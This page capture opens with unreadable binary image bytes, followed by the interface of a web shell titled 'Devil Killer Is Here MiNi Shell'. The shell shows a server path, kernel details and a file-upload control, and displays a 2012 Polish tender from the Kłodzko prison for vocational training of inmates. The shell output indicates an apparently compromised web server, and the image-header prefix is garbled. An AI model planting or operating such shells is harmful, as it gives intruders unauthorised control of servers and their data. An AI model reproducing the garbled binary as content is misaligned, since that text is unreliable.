JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120914/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120914/349168-N-2012.html

<p class="kh_header"><b>Kłodzko: DD/ZP 220/14/2012 Postępowaie na realizację kursów POKL.</b><br>
<b>Numer ogłoszenia: 349168 - 2012; data zamieszczenia: 14.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Kłodzku , ul. Bohaterów Getta 16, 57-300 Kłodzko, woj. dolnośląskie, tel. 074 8651800, 8651854, faks 074 8673017.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DD/ZP 220/14/2012 Postępowaie na realizację kursów POKL..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi w zakresie przeprowadzenia kursów oraz przeprowadzenia dla grup biorących udział w kursach zajęć aktywizacyjnych (CPV 80.50.00.00-8- usługi szkolenia zawodowego) w ramach projektu p.n. Cykl szkoleniowo-aktywizacyjny służący podniesieniu kwalifikacji zawodowych osób pozbawionych wolności oraz przygotowaniu ich do powrotu na rynek pracy po zakończeniu odbywania kary pozbawienia wolności realizowanego przez Centralny Zarząd Służby Więziennej. Projekt ten jest realizowany w ramach Programu Operacyjnego Kapitał Ludzki współfinansowany ze środków Europejskiego Funduszu Społecznego. 

Część 1: Kurs - Monter zabudowy i robót wykończeniowych w budownictwie wraz z zajęciami aktywizacyjnymi

Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursu montera zabudowy i robót wykończeniowych w budownictwie wraz z zajęciami aktywizacyjnymi dla grupy skazanych odbywających karę pozbawienia wolności w Zakładzie Karnym w Kłodzku. 
Celem kursu jest teoretyczne i praktyczne przygotowanie osób pozbawionych wolności do pracy w zawodzie montera zabudowy i robót wykończeniowych w budownictwie oraz przeprowadzenie dla osób biorących udział w kursie zajęć aktywizacyjnych.  
Kurs oraz zajęcia aktywizacyjne odbywać się będą na terenie Zakładu Karnego w Kłodzku w dniach od poniedziałku do soboty w godzinach 8:00-14:30. Zamawiający zobowiązuje się wyznaczyć miejsca, w których odbywać będzie się część teoretyczna i praktyczna kursu. 
Kurs będzie realizowany zgodnie z opracowanym przez Wykonawcę programem przedstawionym w dniu otwarcia ofert, program winien być zgodny z Rozporządzeniem Ministra Edukacji Narodowej z 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2012, poz. 186) oraz Rozporządzeniem Ministra Sprawiedliwości z dnia 13 lutego 2004 r. w sprawie szczegółowych zasad i trybu prowadzenia nauczania w zakładach karnych (Dz. U. z 2004 r. Nr 37, poz. 337 z późniejszymi zmianami w 2009 r. Nr 169, poz. 1331). 
Program będzie stanowił integralną część umowy na zorganizowanie i przeprowadzenie kursu oraz zajęć aktywizacyjnych.
Program zajęć teoretycznych jak i praktycznych powinien obejmować m.in. następujące zagadnienia:
- bezpieczeństwo i higienę pracy,
- sporządzanie dokumentacji budowlanej, rysunku zawodowego oraz planów w celu ustalenia kolejności robót wykończeniowych,
- maszynoznawstwo (sprzęt do prac malarskich, posadzkarsko-glazurniczych, montażu płyt kartonowo-gipsowych),
- materiałoznawstwo,
- przygotowanie i montaż płyt kartonowo-gipsowych na ruszcie krzyżowym stalowym,
- przygotowanie różnych rodzajów podłoży pod malowanie,
- techniki pracy malarskiej,
- przygotowanie podłoży ścian i podłóg z zastosowaniem mas samopoziomujących i   
wyrównujących,
- przygotowanie podłoża i montaż paneli podłogowych,
-  wykonywanie robót posadzkarsko-okładzinowych, 
- przygotowanie podłoża i wykonanie tynku mozaikowego,
- montaż terakoty i glazury,
- osadzanie i montaż stolarki otworowej (okien i drzwi).
Każdy z uczestników kursu powinien w ramach realizacji kursu poznać techniki i w praktyce nauczyć się umiejętności niezbędnych do pracy w tym zawodzie przy zastosowaniu najnowszych technologii i materiałów. Służyć temu będą m.in. zajęcia praktyczne, których zakres ustali Zamawiający z Wykonawcą przed ich rozpoczęciem. Zakres prac zostanie ustalony tak, aby zapewnić uczestnikom kursu możliwość zapoznania się w praktyce z tematyką szkolenia przy jednoczesnym uwzględnieniu warunków i specyfiki miejsca realizacji kursu.
Zajęcia aktywizacyjne będą realizowane zgodnie z programem opracowanym przez Wykonawcę i przedstawionym w dniu otwarcia ofert, Program będzie stanowił integralną część umowy na zorganizowanie i przeprowadzenie kursu i zajęć aktywizacyjnych.
Program powinien gwarantować nabycie przez beneficjentów podstawowych zagadnień związanych ze skutecznym radzeniem sobie na rynku pracy w tym: 
- autoprezentacja;
- komunikacja z pracodawcą;
- rozmowa kwalifikacyjna;
- dokumenty aplikacyjne (wykorzystanie komputera);
- sposoby poszukiwania pracy;
- poznawanie i odkrywanie swoich umiejętności i predyspozycji zawodowych.
Wykonawca w dniu otwarcia ofert przedstawi ankietę służącą ocenie kursu i zajęć aktywizacyjnych. 
Zakres zamówienia:
liczba osób objętych kursem i zajęciami aktywizacyjnymi - 13 osób, w przypadku zmniejszenia liczby uczestników Zamawiający zastrzega sobie, w ramach posiadanej listy rezerwowej uczestników, prawo do skierowania na kurs dodatkowych osób, celem uzupełnienia liczby do 13 osób. Uzupełnienie listy uczestników może nastąpić jedynie w sytuacji jeżeli wprowadzony rezerwowy uczestnik będzie  brał udział w co najmniej 80% godzin kursu i w co najmniej 80 % godzin zajęć aktywizacyjnych.
w przypadku nie ukończenia kursu przez osadzonego, jeżeli nie zostanie uzupełniona liczba uczestników w powyżej opisany sposób, należna Wykonawcy kwota za przeszkolenie tego osadzonego ustalona w umowie ulegnie pomniejszeniu o kwotę stanowiącą iloczyn ilości godzin kursu, w których osadzony nie uczestniczył i kwoty stanowiącej koszt jednostkowy godziny kursu,
liczba zajęć dydaktycznych w ramach kursu - 120 godz. przy założeniu że jedna godzina to 45 min.,  (tj. 90 godz. zajęć praktycznych, 30 godz. zajęć teoretycznych) 
liczba zajęć dydaktycznych w ramach zajęć aktywizacyjnych - 21 godz. przy założeniu że jedna godzina to 45 min.,  w skład których wchodzi: 7 godz. 
z psychologiem, 7 godz. z liderem Klubu Pracy, 7 godz. z doradcą zawodowym,
Wykonawca zapewnia w ramach zajęć teoretycznych uprawnionych wykładowców, 
a w ramach zajęć praktycznych uprawnionych instruktorów praktycznej nauki zawodu (zał. nr 4 do SIWZ) odpowiednio do rodzaju kursu.  
Zajęcia aktywizacyjne muszą być przeprowadzone przez osoby posiadające licencję doradcy zawodowego lub ukończone studia / studia podyplomowe w zakresie doradztwa zawodowego oraz osoby posiadające uprawnienia Lidera Klubu Pracy. 
Zamawiający wymaga złożenia wykazu osób, które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych i wykształcenia niezbędnych do wykonania zamówienia, zakresu wykonywania przez nich czynności oraz informacji o podstawie dysponowania tymi osobami ( zał. nr 4 do SIWZ). 
Kurs może zakończyć się egzaminem sprawdzającym wiadomości i umiejętności z zakresu kursu. Uczestnicy otrzymają zaświadczenia o ukończeniu kursu zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. 2012. 186) oraz zaświadczenia o ukończeniu zajęć aktywizacyjnych. 
Dodatkowo wykonawca zapewni dla każdego uczestnika kursu certyfikaty ukończenia kursu oraz zajęć aktywizacyjnych, które zawierać będą  zapisy umożliwiające identyfikację źródła finansowania kursu  i zajęć aktywizacyjnych poprzez zamieszczenie następującego zapisu: Kurs współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. Certyfikat powinien zostać opatrzony aktualnymi logotypami Unii Europejskiej oraz logo Programu Kapitał Ludzki Narodowa Strategia Spójności. 
Zamawiający zobowiązuje się do udostępnienia sprzętu zakupionego w ramach projektu, w celu wykorzystania go podczas zajęć teoretycznych i praktycznych kursu:
- zajęcia teoretyczne: rzutnik multimedialny, możliwość korzystania z sali komputerowej wraz z wyposażeniem;
- zajęcia praktyczne: pistolet natryskowy ze sprężarką, rusztowanie aluminiowe,  szlifierka do powierzchni gipsowych,  mieszadło do farb, młoty udar.-obrot,   przecinarka elektryczna do glazury, dłuta, wiertła, przecinaki; 
Wykonawca zobowiązany jest zapewnić na swój koszt:
- przeprowadzenie badań lekarskich przed rozpoczęciem szkolenia dla 13 uczestników kursu, badania będą odbywały się na terenie Zakładu Karnego w Kłodzku, Wykonawca przedstawi  Zamawiającemu kserokopie zaświadczeń lekarskich, 
- ubezpieczenie w niezbędnym zakresie (NNW) uczestników kursu i zajęć aktywizacyjnych, Wykonawca przedstawi Zamawiającemu kserokopie dowodu ubezpieczenia, 
- pokrycia kosztów  ubezpieczenia oraz pokrycia kosztów wymaganych odrębnymi przepisami badań lekarskich 2 osób z listy rezerwowej, w razie konieczności pokrycia kosztów odzieży roboczej dla wprowadzonych uczestników rezerwowych,
- w ramach zajęć teoretycznych podręczniki, skrypty, materiały papiernicze, przybory do pisania (wkład koloru niebieskiego lub zielonego), środki dydaktyczne niezbędne do realizacji kursów i zajęć aktywizacyjnych, na których Wykonawca umieści  zapisy umożliwiające identyfikację źródeł finansowania lub opatrzy je logotypami umożliwiającą taką identyfikację zgodnie z treścią Wytycznych w zakresie informacji i promocji oraz Wytycznych dot. oznaczania projektów w ramach POKL,
- w ramach zajęć praktycznych odzież ochronną zgodnie z bhp w ilości 13 kompletów składających się z: spodni na szelkach, podkoszulki, bluzy, czapki, rękawic i obuwia roboczego a także środki ochrony indywidualnej,
- w ramach zajęć praktycznych materiały niezbędne do prawidłowego przeprowadzenia zajęć w wysokości nie większej niż 40% kosztu kursu (bez zajęć aktywizacyjnych). Ilość oraz asortyment materiałów niezbędnych do realizacji zajęć praktycznych określonych w programie kursu  winny mieć charakter celowy i uwzględniać wymogi jakie określa program nauczania oraz jego cel. Tym samym ilość zakupionych i wykorzystanych materiałów powinna odpowiadać zakresowi, planowi zajęć praktycznych z uwzględnieniem ilości beneficjentów biorących udział w szkoleniu. Wykonawca przedłoży Zamawiającemu kopie faktur VAT lub rachunków potwierdzających dostarczenie w wymaganej ilości materiałów do przeprowadzenia praktycznej nauki zawodu w ramach kursu, 
- w ramach zajęć praktycznych niezbędny sprzęt oraz narzędzia drobne do zrealizowania zajęć, których nie posiada Zamawiający.

Część 2: Kurs - Monter zabudowy i robót wykończeniowych w budownictwie wraz z zajęciami aktywizacyjnymi

Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursu montera zabudowy i robót wykończeniowych w budownictwie wraz z zajęciami aktywizacyjnymi dla grupy skazanych odbywających karę pozbawienia wolności w Zakładzie Karnym w Kłodzku. 
Celem kursu jest teoretyczne i praktyczne przygotowanie osób pozbawionych wolności do pracy w zawodzie montera zabudowy i robót wykończeniowych w budownictwie oraz przeprowadzenie dla osób biorących udział w kursie zajęć aktywizacyjnych.  
Kurs oraz zajęcia aktywizacyjne odbywać się będą na terenie Zakładu Karnego w Kłodzku w dniach od poniedziałku do soboty w godzinach 8:00-14:30. Zamawiający zobowiązuje się wyznaczyć miejsca, w których odbywać będzie się część teoretyczna i praktyczna kursu. 
Kurs będzie realizowany zgodnie z opracowanym przez Wykonawcę programem przedstawionym w dniu otwarcia ofert, program winien być zgodny z Rozporządzeniem Ministra Edukacji Narodowej z 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2012, poz. 186) oraz Rozporządzeniem Ministra Sprawiedliwości z dnia 13 lutego 2004 r. w sprawie szczegółowych zasad i trybu prowadzenia nauczania w zakładach karnych (Dz. U. z 2004 r. Nr 37, poz. 337 z późniejszymi zmianami w 2009 r. Nr 169, poz. 1331). 
Program będzie stanowił integralną część umowy na zorganizowanie i przeprowadzenie kursu oraz zajęć aktywizacyjnych.
Program zajęć teoretycznych jak i praktycznych powinien obejmować m.in. następujące zagadnienia:
- bezpieczeństwo i higienę pracy,
- sporządzanie dokumentacji budowlanej, rysunku zawodowego oraz planów w celu ustalenia kolejności robót wykończeniowych,
- maszynoznawstwo (sprzęt do prac malarskich, posadzkarsko-glazurniczych, montażu płyt kartonowo-gipsowych),
- materiałoznawstwo,
- przygotowanie i montaż płyt kartonowo-gipsowych na ruszcie krzyżowym stalowym,
- przygotowanie różnych rodzajów podłoży pod malowanie,
- techniki pracy malarskiej,
- przygotowanie podłoży ścian i podłóg z zastosowaniem mas samopoziomujących i   
wyrównujących,
- przygotowanie podłoża i montaż paneli podłogowych,
-  wykonywanie robót posadzkarsko-okładzinowych, 
- przygotowanie podłoża i wykonanie tynku mozaikowego,
- montaż terakoty i glazury,
- osadzanie i montaż stolarki otworowej (okien i drzwi).
Każdy z uczestników kursu powinien w ramach realizacji kursu poznać techniki i w praktyce nauczyć się umiejętności niezbędnych do pracy w tym zawodzie przy zastosowaniu najnowszych technologii i materiałów. Służyć temu będą m.in. zajęcia praktyczne, których zakres ustali Zamawiający z Wykonawcą przed ich rozpoczęciem. Zakres prac zostanie ustalony tak, aby zapewnić uczestnikom kursu możliwość zapoznania się w praktyce z tematyką szkolenia przy jednoczesnym uwzględnieniu warunków i specyfiki miejsca realizacji kursu.
Zajęcia aktywizacyjne będą realizowane zgodnie z programem opracowanym przez Wykonawcę i przedstawionym w dniu otwarcia ofert, Program będzie stanowił integralną część umowy na zorganizowanie i przeprowadzenie kursu i zajęć aktywizacyjnych.
Program powinien gwarantować nabycie przez beneficjentów podstawowych zagadnień związanych ze skutecznym radzeniem sobie na rynku pracy w tym: 
- autoprezentacja;
- komunikacja z pracodawcą;
- rozmowa kwalifikacyjna;
- dokumenty aplikacyjne (wykorzystanie komputera);
- sposoby poszukiwania pracy;
- poznawanie i odkrywanie swoich umiejętności i predyspozycji zawodowych.
Wykonawca w dniu otwarcia ofert przedstawi ankietę służącą ocenie kursu i zajęć aktywizacyjnych. 
Zakres zamówienia:
liczba osób objętych kursem i zajęciami aktywizacyjnymi - 13 osób, w przypadku zmniejszenia liczby uczestników Zamawiający zastrzega sobie, w ramach posiadanej listy rezerwowej uczestników, prawo do skierowania na kurs dodatkowych osób, celem uzupełnienia liczby do 13 osób. Uzupełnienie listy uczestników może nastąpić jedynie w sytuacji jeżeli wprowadzony rezerwowy uczestnik będzie  brał udział w co najmniej 80% godzin kursu i w co najmniej 80 % godzin zajęć aktywizacyjnych.
w przypadku nie ukończenia kursu przez osadzonego, jeżeli nie zostanie uzupełniona liczba uczestników w powyżej opisany sposób, należna Wykonawcy kwota za przeszkolenie tego osadzonego ustalona w umowie ulegnie pomniejszeniu o kwotę stanowiącą iloczyn ilości godzin kursu, w których osadzony nie uczestniczył i kwoty stanowiącej koszt jednostkowy godziny kursu,
liczba zajęć dydaktycznych w ramach kursu - 120 godz. przy założeniu że jedna godzina to 45 min.,  (tj. 90 godz. zajęć praktycznych, 30 godz. zajęć teoretycznych) 
liczba zajęć dydaktycznych w ramach zajęć aktywizacyjnych - 21 godz. przy założeniu że jedna godzina to 45 min.,  w skład których wchodzi: 7 godz. 
z psychologiem, 7 godz. z liderem Klubu Pracy, 7 godz. z doradcą zawodowym,
Wykonawca zapewnia w ramach zajęć teoretycznych uprawnionych wykładowców, 
a w ramach zajęć praktycznych uprawnionych instruktorów praktycznej nauki zawodu (zał. nr 4 do SIWZ) odpowiednio do rodzaju kursu.  
Zajęcia aktywizacyjne muszą być przeprowadzone przez osoby posiadające licencję doradcy zawodowego lub ukończone studia / studia podyplomowe w zakresie doradztwa zawodowego oraz osoby posiadające uprawnienia Lidera Klubu Pracy. 
Zamawiający wymaga złożenia wykazu osób, które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych i wykształcenia niezbędnych do wykonania zamówienia, zakresu wykonywania przez nich czynności oraz informacji o podstawie dysponowania tymi osobami ( zał. nr 4 do SIWZ). 
Kurs może zakończyć się egzaminem sprawdzającym wiadomości i umiejętności z zakresu kursu. Uczestnicy otrzymają zaświadczenia o ukończeniu kursu zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. 2012. 186) oraz zaświadczenia o ukończeniu zajęć aktywizacyjnych. 
Dodatkowo wykonawca zapewni dla każdego uczestnika kursu certyfikaty ukończenia kursu oraz zajęć aktywizacyjnych, które zawierać będą  zapisy umożliwiające identyfikację źródła finansowania kursu  i zajęć aktywizacyjnych poprzez zamieszczenie następującego zapisu: Kurs współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. Certyfikat powinien zostać opatrzony aktualnymi logotypami Unii Europejskiej oraz logo Programu Kapitał Ludzki Narodowa Strategia Spójności. 
Zamawiający zobowiązuje się do udostępnienia sprzętu zakupionego w ramach projektu, w celu wykorzystania go podczas zajęć teoretycznych i praktycznych kursu:
- zajęcia teoretyczne: rzutnik multimedialny, możliwość korzystania z sali komputerowej wraz z wyposażeniem;
- zajęcia praktyczne: pistolet natryskowy ze sprężarką, rusztowanie aluminiowe,  szlifierka do powierzchni gipsowych,  mieszadło do farb, młoty udar.-obrot,   przecinarka elektryczna do glazury, dłuta, wiertła, przecinaki; 
Wykonawca zobowiązany jest zapewnić na swój koszt:
- przeprowadzenie badań lekarskich przed rozpoczęciem szkolenia dla 13 uczestników kursu, badania będą odbywały się na terenie Zakładu Karnego w Kłodzku, Wykonawca przedstawi  Zamawiającemu kserokopie zaświadczeń lekarskich, 
- ubezpieczenie w niezbędnym zakresie (NNW) uczestników kursu i zajęć aktywizacyjnych, Wykonawca przedstawi Zamawiającemu kserokopie dowodu ubezpieczenia, 
- pokrycia kosztów  ubezpieczenia oraz pokrycia kosztów wymaganych odrębnymi przepisami badań lekarskich 2 osób z listy rezerwowej, w razie konieczności pokrycia kosztów odzieży roboczej dla wprowadzonych uczestników rezerwowych,
- w ramach zajęć teoretycznych podręczniki, skrypty, materiały papiernicze, przybory do pisania (wkład koloru niebieskiego lub zielonego), środki dydaktyczne niezbędne do realizacji kursów i zajęć aktywizacyjnych, na których Wykonawca umieści  zapisy umożliwiające identyfikację źródeł finansowania lub opatrzy je logotypami umożliwiającą taką identyfikację zgodnie z treścią Wytycznych w zakresie informacji i promocji oraz Wytycznych dot. oznaczania projektów w ramach POKL,
- w ramach zajęć praktycznych odzież ochronną zgodnie z bhp w ilości 13 kompletów składających się z: spodni na szelkach, podkoszulki, bluzy, czapki, rękawic i obuwia roboczego a także środki ochrony indywidualnej,
- w ramach zajęć praktycznych materiały niezbędne do prawidłowego przeprowadzenia zajęć w wysokości nie większej niż 40% kosztu kursu (bez zajęć aktywizacyjnych). Ilość oraz asortyment materiałów niezbędnych do realizacji zajęć praktycznych określonych w programie kursu  winny mieć charakter celowy i uwzględniać wymogi jakie określa program nauczania oraz jego cel. Tym samym ilość zakupionych i wykorzystanych materiałów powinna odpowiadać zakresowi, planowi zajęć praktycznych z uwzględnieniem ilości beneficjentów biorących udział w szkoleniu. Wykonawca przedłoży Zamawiającemu kopie faktur VAT lub rachunków potwierdzających dostarczenie w wymaganej ilości materiałów do przeprowadzenia praktycznej nauki zawodu w ramach kursu, 
- w ramach zajęć praktycznych niezbędny sprzęt oraz narzędzia drobne do zrealizowania zajęć, których nie posiada Zamawiający.
Część 3: Kurs - Monter zabudowy i robót wykończeniowych w budownictwie wraz z zajęciami aktywizacyjnymi

Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursu montera zabudowy i robót wykończeniowych w budownictwie wraz z zajęciami aktywizacyjnymi dla grupy skazanych odbywających karę pozbawienia wolności w Zakładzie Karnym w Kłodzku. 
Celem kursu jest teoretyczne i praktyczne przygotowanie osób pozbawionych wolności do pracy w zawodzie montera zabudowy i robót wykończeniowych w budownictwie oraz przeprowadzenie dla osób biorących udział w kursie zajęć aktywizacyjnych.  
Kurs oraz zajęcia aktywizacyjne odbywać się będą na terenie Zakładu Karnego w Kłodzku w dniach od poniedziałku do soboty w godzinach 8:00-14:30. Zamawiający zobowiązuje się wyznaczyć miejsca, w których odbywać będzie się część teoretyczna i praktyczna kursu. 
Kurs będzie realizowany zgodnie z opracowanym przez Wykonawcę programem przedstawionym w dniu otwarcia ofert, program winien być zgodny z Rozporządzeniem Ministra Edukacji Narodowej z 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2012, poz. 186) oraz Rozporządzeniem Ministra Sprawiedliwości z dnia 13 lutego 2004 r. w sprawie szczegółowych zasad i trybu prowadzenia nauczania w zakładach karnych (Dz. U. z 2004 r. Nr 37, poz. 337 z późniejszymi zmianami w 2009 r. Nr 169, poz. 1331). 
Program będzie stanowił integralną część umowy na zorganizowanie i przeprowadzenie kursu oraz zajęć aktywizacyjnych.
Program zajęć teoretycznych jak i praktycznych powinien obejmować m.in. następujące zagadnienia:
- bezpieczeństwo i higienę pracy,
- sporządzanie dokumentacji budowlanej, rysunku zawodowego oraz planów w celu ustalenia kolejności robót wykończeniowych,
- maszynoznawstwo (sprzęt do prac malarskich, posadzkarsko-glazurniczych, montażu płyt kartonowo-gipsowych),
- materiałoznawstwo,
- przygotowanie i montaż płyt kartonowo-gipsowych na ruszcie krzyżowym stalowym,
- przygotowanie różnych rodzajów podłoży pod malowanie,
- techniki pracy malarskiej,
- przygotowanie podłoży ścian i podłóg z zastosowaniem mas samopoziomujących i   
wyrównujących,
- przygotowanie podłoża i montaż paneli podłogowych,
-  wykonywanie robót posadzkarsko-okładzinowych, 
- przygotowanie podłoża i wykonanie tynku mozaikowego,
- montaż terakoty i glazury,
- osadzanie i montaż stolarki otworowej (okien i drzwi).
Każdy z uczestników kursu powinien w ramach realizacji kursu poznać techniki i w praktyce nauczyć się umiejętności niezbędnych do pracy w tym zawodzie przy zastosowaniu najnowszych technologii i materiałów. Służyć temu będą m.in. zajęcia praktyczne, których zakres ustali Zamawiający z Wykonawcą przed ich rozpoczęciem. Zakres prac zostanie ustalony tak, aby zapewnić uczestnikom kursu możliwość zapoznania się w praktyce z tematyką szkolenia przy jednoczesnym uwzględnieniu warunków i specyfiki miejsca realizacji kursu.
Zajęcia aktywizacyjne będą realizowane zgodnie z programem opracowanym przez Wykonawcę i przedstawionym w dniu otwarcia ofert, Program będzie stanowił integralną część umowy na zorganizowanie i przeprowadzenie kursu i zajęć aktywizacyjnych.
Program powinien gwarantować nabycie przez beneficjentów podstawowych zagadnień związanych ze skutecznym radzeniem sobie na rynku pracy w tym: 
- autoprezentacja;
- komunikacja z pracodawcą;
- rozmowa kwalifikacyjna;
- dokumenty aplikacyjne (wykorzystanie komputera);
- sposoby poszukiwania pracy;
- poznawanie i odkrywanie swoich umiejętności i predyspozycji zawodowych.
Wykonawca w dniu otwarcia ofert przedstawi ankietę służącą ocenie kursu i zajęć aktywizacyjnych. 
Zakres zamówienia:
liczba osób objętych kursem i zajęciami aktywizacyjnymi - 13 osób, w przypadku zmniejszenia liczby uczestników Zamawiający zastrzega sobie, w ramach posiadanej listy rezerwowej uczestników, prawo do skierowania na kurs dodatkowych osób, celem uzupełnienia liczby do 13 osób. Uzupełnienie listy uczestników może nastąpić jedynie w sytuacji jeżeli wprowadzony rezerwowy uczestnik będzie  brał udział w co najmniej 80% godzin kursu i w co najmniej 80 % godzin zajęć aktywizacyjnych.
